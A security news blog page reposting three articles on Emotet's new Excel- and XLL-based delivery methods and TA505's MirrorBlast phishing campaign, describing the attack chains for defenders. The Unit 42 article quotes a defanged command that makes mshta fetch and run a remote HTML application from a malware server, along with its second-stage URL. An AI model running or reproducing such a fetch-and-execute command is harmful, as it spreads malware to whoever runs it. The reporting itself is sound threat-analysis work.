Search This Blog

Showing posts with label Excel File. Show all posts

Emotet is Evolving with Different Delivery Methods

 

Emotet is a well-known botnet and trojan which distributes follow-on malware via Windows platforms.  After a 10-month pause amid a coordinated law enforcement operation to take down its assault infrastructure, Emotet, the work of a cybercrime organization known as TA542 (formerly known as Mummy Spider or Gold Crestwood), marked its comeback late last year. 

Since then, Emotet campaigns have sent tens of thousands of messages to thousands of clients across many geographic regions, with message volumes exceeding one million in some situations. The threat actor behind the popular Emotet botnet is experimenting with new attack methods on a small scale before incorporating them into larger-scale spam campaigns, possibly in response to Microsoft's decision to deactivate Visual Basic for Applications (VBA) macros by default across all of its products.

According to analysts, the malicious actors behind Emotet, TA542, are experimenting with new approaches on a micro level before deploying them on a larger scale. The current wave of attacks is claimed to have occurred between April 4 and April 19, 2022, when prior large-scale Emotet campaigns were halted. 

Researchers from Proofpoint discovered numerous distinguishing characteristics in the campaign, including the usage of OneDrive URLs rather than Emotet's traditional dependence on Microsoft Office attachments or URLs connecting to Office files. Instead of Emotet's previous use of Microsoft Excel or Word documents with VBA or XL4 macros, the campaign employed XLL files, which are a sort of dynamic link library (DLL) file designed to expand the capability of Excel.

Alternatively, these additional TTPs could mean the TA542 is now conducting more targeted and limited-scale attacks in addition to the traditional mass-scale email operations. The lack of macro-enabled Microsoft Excel or Word document attachments is a notable departure from prior Emotet attacks, implying the threat actor is abandoning the tactic to avoid Microsoft's intentions to disable VBA macros by default beginning April 2022. 

The development came after the virus writers addressed an issue last week which prevented potential victims from being compromised when they opened weaponized email attachments.

Malicious Excel Files are Now Being Used to Spread Emotet Malware

 

Researchers discovered that the infamous Emotet malware has altered methods yet again, this time in an email campaign propagated by infected Excel files. In a report released online on Tuesday, researchers from Palo Alto Networks Unit 42 detected a new infection strategy for the high-volume malware, which is known to alter and change its attack vectors to avoid detection and continue its malicious job. 

Emotet was found in 2014 as a banking trojan, and it has been quite active in recent years. The Emotet botnet infrastructure was taken down in January 2021 by law enforcement and judicial agencies, but Emotet resurfaced in November 2021 and has remained active since then. Thread hijacking is a common attack tactic used by Emotet. This method generates bogus responses based on legitimate emails obtained from mail clients of Emotet-infected Windows hosts. This stolen email data is used by the botnet to generate false replies imitating the original senders. 

The new attack vector, found on December 21 and still active, sends an Excel file with an obfuscated Excel 4.0 macro via socially engineered emails. These macros are an ancient Excel feature that malicious actors routinely exploit. Before the malicious content can be activated, the victim must enable macros on a vulnerable Windows host. 

When the macro code is enabled, cmd.exe is executed to launch mshta.exe with an argument to obtain and run a remote HTML application. In order to avoid static detection methods, the code employs hex and character obfuscation, cmd /c mshta hxxp://91.240.118[.]168/se/s.html is the deobfuscated command string that is executed. The HTML application has been heavily obfuscated. It will download and run additional PowerShell code.

The first PowerShell script is obfuscated and connects to hxxp://91.240.118[.]168/se/s.png. This URL delivers a text-based script for a second-stage set of PowerShell code aimed at retrieving an Emotet binary. This second-stage PowerShell code contains 14 URLs that will be used to retrieve the Emotet binaries. 

Each URL is tried until an Emotet binary is successfully downloaded. The use of numerous URLs strengthens this assault in the case that one of the URLs is taken down. As the final stage of this attack chain, the Emotet DLL loads an encrypted PE from its resource area. 

“Emotet’s new attack chain reveals multiple stages with different file types and obfuscated script before arriving at the final Emotet payload,” Unit 42 researchers Saqib Khanzada, Tyler Halfpop, Micah Yates and Brad Duncan wrote.

This New Phishing Attack Uses a Weaponized Excel File

 

A new phishing campaign is targeting financial sector employees by using links to download a ‘weaponized’ Excel document.

MirrorBlast, a phishing effort, was discovered in early September by security firm ET Labs. Morphisec, a fellow security firm, has now studied the malware and warns that the malicious Excel files might escape malware-detection systems due to "extremely lightweight" embedded macros, making it especially risky for businesses that rely on detection-based protection and sandboxing. 

Macros, or scripts for automating activities, have grown in popularity among cybercriminals. Despite the fact that macros are disabled by default in Excel, attackers employ social engineering to deceive potential victims into allowing macros. Despite appearing to be a simple approach, macros have been employed by state-sponsored hackers because they frequently work. 

Microsoft earlier this year extended its Antimalware Scan Interface (AMSI) for antivirus to combat the rise in macro malware and a recent phenomenon by attackers to utilise outdated Excel 4.0 XLM macros (rather than newer VBA macros) to circumvent anti-malware systems. 

As per Morphisec, the MirrorBlast attack chain is similar to tactics used by TA505, a well-established, financially focused Russia-based cybercriminal group. The group has been active since at least 2014 and is well-known for its usage of a wide range of tools. 

Morphisec researcher Arnold Osipov stated in a blog post, "TA505 is most known for frequently changing the malware they use as well as driving global trends in malware distribution." 

While the MirrorBlast attack begins with a document attached to an email, it afterwards uses a Google feed proxy URL with a SharePoint and OneDrive trap that masquerades as a file-sharing request. When the user clicks the URL, they are sent to a hacked SharePoint site or a bogus OneDrive site. Both versions will take to the malicious Excel document. 

The sample MirrorBlast email demonstrates how the attackers are capitalising on company-issued data on COVID-related modifications to working conditions. Morphisec points out that due to compatibility issues with ActiveX components, the macro code can only be run on a 32-bit version of Office. The macro itself runs a JavaScript script meant to avoid sandboxing by determining if the computer is in administrator mode. The msiexec.exe process is then launched, which downloads and instals an MSI package. 

Morphisec discovered two MIS installation versions that employed legal scripting tools named KiXtart and REBOL. The KiXtart script transmits information about the victim's workstation to the attacker's command and control server, including the domain, computer name, user name, and process list. It then answers with a number indicating whether the Rebol version should be used. Morphisec states that the Rebol script leads to a remote access tool called FlawedGrace, which the group has previously utilised. 

Osipov added, "TA505 is one of many financially motivated threat groups currently active in the marketplace. They are also one of the most creative, as they have a tendency to constantly shift the attacks they leverage to achieve their goals."